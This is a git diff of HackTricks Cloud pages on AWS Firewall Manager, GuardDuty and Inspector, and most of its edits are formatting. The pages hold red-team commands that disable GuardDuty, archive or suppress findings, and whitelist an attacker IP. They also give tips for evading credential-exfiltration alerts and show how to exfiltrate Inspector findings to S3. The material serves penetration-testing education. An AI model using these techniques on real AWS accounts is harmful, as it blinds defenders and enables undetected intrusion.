@@ -207,19 +194,25 @@ An example of permisive policy through permisive security group, in order to byp ```json { - "Policy": { - "PolicyName": "permisive_policy", - "SecurityServicePolicyData": { - "Type": "SECURITY_GROUPS_COMMON", - "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" - }, - "ResourceTypeList": ["AWS::EC2::Instance", "AWS::EC2::NetworkInterface", "AWS::EC2::SecurityGroup", "AWS::ElasticLoadBalancingV2::LoadBalancer", "AWS::ElasticLoadBalancing::LoadBalancer"], - "ResourceType": "AWS::EC2::SecurityGroup", - "ExcludeResourceTags": false, - "ResourceTags": [], - "RemediationEnabled": true + "Policy": { + "PolicyName": "permisive_policy", + "SecurityServicePolicyData": { + "Type": "SECURITY_GROUPS_COMMON", + "ManagedServiceData": "{\"type\":\"SECURITY_GROUPS_COMMON\",\"securityGroups\":[{\"id\":\"\"}], \"applyToAllEC2InstanceENIs\":\"true\",\"IncludeSharedVPC\":\"true\"}" }, - "TagList": [] + "ResourceTypeList": [ + "AWS::EC2::Instance", + "AWS::EC2::NetworkInterface", + "AWS::EC2::SecurityGroup", + "AWS::ElasticLoadBalancingV2::LoadBalancer", + "AWS::ElasticLoadBalancing::LoadBalancer" + ], + "ResourceType": "AWS::EC2::SecurityGroup", + "ExcludeResourceTags": false, + "ResourceTags": [], + "RemediationEnabled": true + }, + "TagList": [] } ``` @@ -271,9 +264,9 @@ To use **`fms:PutNotificationChannel`** outside of the console, you need to set For information about configuring an SNS access policy: -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-sns-enum.md +{{#endref}} ```bash aws fms put-notification-channel --sns-topic-arn --sns-role-name 
@@ -286,9 +279,8 @@ aws fms delete-notification-channel An attacker with the **`fms:AssociateThirdPartyFirewall`**, **`fms:DisssociateThirdPartyFirewall`** permissions would be able to associate or disassociate third-party firewalls from being managed centrally through AWS Firewall Manager. -{% hint style="warning" %} -Only the default administrator can create and manage third-party firewalls. -{% endhint %} +> [!WARNING] +> Only the default administrator can create and manage third-party firewalls. ```bash aws fms associate-third-party-firewall --third-party-firewall [PALO_ALTO_NETWORKS_CLOUD_NGFW | FORTIGATE_CLOUD_NATIVE_FIREWALL] 
@@ -310,21 +302,8 @@ aws fms untag-resource --resource-arn --tag-keys ## References -* [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) -* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) -* [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) +- [https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html](https://docs.aws.amazon.com/govcloud-us/latest/UserGuide/govcloud-fms.html) +- [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsfirewallmanager.html) +- [https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html](https://docs.aws.amazon.com/waf/latest/developerguide/fms-chapter.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md similarity index 60% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md index 3f2e03746..6b102d98c 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-guardduty-enum.md @@ -1,19 +1,6 @@ # AWS - GuardDuty Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## GuardDuty 
@@ -23,17 +10,16 @@ Amazon GuardDuty **identifies unusual activity within your accounts**, analyses Alerts **appear in the GuardDuty console (90 days)** and CloudWatch Events. -{% hint style="warning" %} -When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ -If you just stop it, the existing findings will remain. -{% endhint %} +> [!WARNING] +> When a user **disable GuardDuty**, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the **existing findings will be lost**.\ +> If you just stop it, the existing findings will remain. ### Findings Example -* **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. -* **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. -* **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. 
-* **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets. +- **Reconnaissance**: Activity suggesting reconnaissance by an attacker, such as **unusual API activity**, suspicious database **login** attempts, intra-VPC **port scanning**, unusual failed login request patterns, or unblocked port probing from a known bad IP. +- **Instance compromise**: Activity indicating an instance compromise, such as **cryptocurrency mining, backdoor command and control (C\&C)** activity, malware using domain generation algorithms (DGA), outbound denial of service activity, unusually **high network** traffic volume, unusual network protocols, outbound instance communication with a known malicious IP, temporary Amazon EC2 credentials used by an external IP address, and data exfiltration using DNS. +- **Account compromise**: Common patterns indicative of account compromise include API calls from an unusual geolocation or anonymizing proxy, attempts to disable AWS CloudTrail logging, changes that weaken the account password policy, unusual instance or infrastructure launches, infrastructure deployments in an unusual region, credential theft, suspicious database login activity, and API calls from known malicious IP addresses. 
+- **Bucket compromise**: Activity indicating a bucket compromise, such as suspicious data access patterns indicating credential misuse, unusual Amazon S3 API activity from a remote host, unauthorized S3 access from known malicious IP addresses, and API calls to retrieve data in S3 buckets from a user with no prior history of accessing the bucket or invoked from an unusual location. Amazon GuardDuty continuously monitors and analyzes AWS CloudTrail S3 data events (e.g. GetObject, ListObjects, DeleteObject) to detect suspicious activity across all of your Amazon S3 buckets.
@@ -41,26 +27,26 @@ If you just stop it, the existing findings will remain. Finding summary: -* Finding type -* Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low -* Region -* Account ID -* Resource ID -* Time of detection -* Which threat list was used +- Finding type +- Severity: 7-8.9 High, 4-6.9 Medium, 01-3.9 Low +- Region +- Account ID +- Resource ID +- Time of detection +- Which threat list was used The body has this information: -* Resource affected -* Action -* Actor: Ip address, port and domain -* Additional Information +- Resource affected +- Action +- Actor: Ip address, port and domain +- Additional Information
### All Findings -Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +Access a list of all the GuardDuty findings in: [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) ### Multi Accounts @@ -76,7 +62,6 @@ An account that gets designated as a delegated administrator becomes a GuardDuty ## Enumeration -{% code overflow="wrap" %} ```bash # Get Org config aws guardduty list-organization-admin-accounts #Get Delegated Administrator @@ -96,7 +81,7 @@ aws guardduty list-filters --detector-id # Check filters aws guardduty get-filter --detector-id --filter-name # Findings -aws guardduty list-findings --detector-id # List findings +aws guardduty list-findings --detector-id # List findings aws guardduty get-findings --detector-id --finding-ids # Get details about the finding aws guardduty get-findings-statistics --detector-id --finding-statistic-types @@ -116,7 +101,6 @@ aws guardduty list-publishing-destinations --detector-id aws guardduty list-threat-intel-sets --detector-id aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id ``` -{% endcode %} ## GuardDuty Bypass 
@@ -124,17 +108,17 @@ aws guardduty get-threat-intel-set --detector-id --threat-intel-set-id Try to find out as much as possible about the behaviour of the credentials you are going to use: -* Times it's used -* Locations -* User Agents / Services (It could be used from awscli, webconsole, lambda...) -* Permissions regularly used +- Times it's used +- Locations +- User Agents / Services (It could be used from awscli, webconsole, lambda...) +- Permissions regularly used With this information, recreate as much as possible the same scenario to use the access: -* If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) -* If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges -* Always try to use the **same permissions** this principal has used -* If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) +- If it's a **user or a role accessed by a user**, try to use it in the same hours, from the same geolocation (even the same ISP and IP if possible) +- If it's a **role used by a service**, create the same service in the same region and use it from there in the same time ranges +- Always try to use the **same permissions** this principal has used +- If you need to **use other permissions or abuse a permission** (for example, download 1.000.000 cloudtrail log files) do it **slowly** and with the **minimum amount of interactions** with AWS (awscli sometime call several read APIs before the write one) ### Breaking GuardDuty 
@@ -142,50 +126,41 @@ With this information, recreate as much as possible the same scenario to use the With this permission you could disable GuardDuty to avoid triggering alerts. -{% code overflow="wrap" %} ```bash -aws guardduty update-detector --detector-id --no-enable +aws guardduty update-detector --detector-id --no-enable aws guardduty update-detector --detector-id --data-sources S3Logs={Enable=false} ``` -{% endcode %} #### `guardduty:CreateFilter` Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings: -{% code overflow="wrap" %} ```bash aws guardduty create-filter --detector-id --name --finding-criteria file:///tmp/criteria.json --action ARCHIVE ``` -{% endcode %} #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`) Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts. -{% code overflow="wrap" %} ```bash aws guardduty update-ip-set --detector-id --activate --ip-set-id --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv ``` -{% endcode %} #### `guardduty:DeletePublishingDestination` Attackers could remove the destination to prevent alerting: -{% code overflow="wrap" %} ```bash aws guardduty delete-publishing-destination --detector-id --destination-id ``` -{% endcode %} -{% hint style="danger" %} -Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. -{% endhint %} +> [!CAUTION] +> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. 
GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. ### Specific Findings Bypass Examples -Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. +Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. Here you have a couple of examples of specific GuardDuty findings bypasses: 
@@ -201,32 +176,18 @@ To prevent this you can search from the script `session.py` in the `botocore` pa Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert. -{% hint style="success" %} -Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. -{% endhint %} +> [!TIP] +> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. 
## References -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) -* [https://docs.aws.amazon.com/guardduty/latest/ug/findings\_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_upload-lists.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) -* [https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-ec2.html#unauthorizedaccess-ec2-torclient](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) -* [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty\_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) -* [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) +- 
[https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) +- [https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html](https://docs.aws.amazon.com/cli/latest/reference/guardduty/delete-publishing-destination.html) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-ec2.html#unauthorizedaccess-ec2-torclient) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) +- [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) +- [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md similarity index 75% rename from pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md index c2e414d65..38692c854 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md @@ -2,20 +2,7 @@ ## AWS - Inspector Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ### Inspector 
@@ -27,15 +14,15 @@ Amazon Inspector is an advanced, automated vulnerability management service desi Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as: -* **Active**: The finding has not been remediated. -* **Closed**: The finding has been remediated. -* **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. +- **Active**: The finding has not been remediated. +- **Closed**: The finding has been remediated. +- **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. Findings are also categorized into the next three types: -* **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. -* **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. -* **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups. +- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. +- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. +- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. 
These include open ports, insecure network protocols, and misconfigured security groups. #### Filters and Suppression Rules 
@@ -57,42 +44,42 @@ When exporting findings, a Key Management Service (KMS) key is necessary to encr Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account. -* **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. -* **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. +- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. +- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. The scan mode determines which method will be used to perform EC2 scans: -* **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. -* **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. 
+- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. +- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10: -* `/usr/lib` -* `/usr/lib64` -* `/usr/local/lib` -* `/usr/local/lib64` +- `/usr/lib` +- `/usr/lib64` +- `/usr/local/lib` +- `/usr/local/lib64` #### Amazon ECR container images scanning Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently. -* **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. -* **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. 
It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. +- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. +- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. #### Amazon Lambda functions scanning Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions: -* **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding. -* **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. +- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. 
For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding. +- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. #### **Center for Internet Security (CIS) scans** Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines. -* **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. -* **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. -* **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. +- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. +- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. +- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. ### Enumeration 
@@ -199,11 +186,10 @@ aws inspector list-rules-packages ### Post Exploitation -{% hint style="success" %} -From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. - -However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). -{% endhint %} +> [!TIP] +> From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. +> +> However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). #### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport` @@ -222,30 +208,26 @@ The following example shows how to exfiltrate all the Active findings from Amazo ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "allow-inspector", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": [ - "s3:PutObject", - "s3:PutObjectAcl", - "s3:AbortMultipartUpload" - ], - "Resource": "arn:aws:s3:::inspector-findings/*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - }, - "ArnLike": { - "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" - } - } - } - ] + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "allow-inspector", + "Effect": "Allow", + "Principal": { + "Service": "inspector2.amazonaws.com" + }, + "Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], + "Resource": "arn:aws:s3:::inspector-findings/*", + "Condition": { + "StringEquals": { + "aws:SourceAccount": "" + }, + "ArnLike": { + "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" + } + } + } + ] } ``` 
@@ -289,7 +271,7 @@ The following example shows how to exfiltrate all the Active findings from Amazo aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f ``` -* **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. +- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport` @@ -302,7 +284,7 @@ aws inspector2 cancel-findings-report --report-id aws inspector2 cancel-sbom-export --report-id ``` -* **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. +- **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter` 
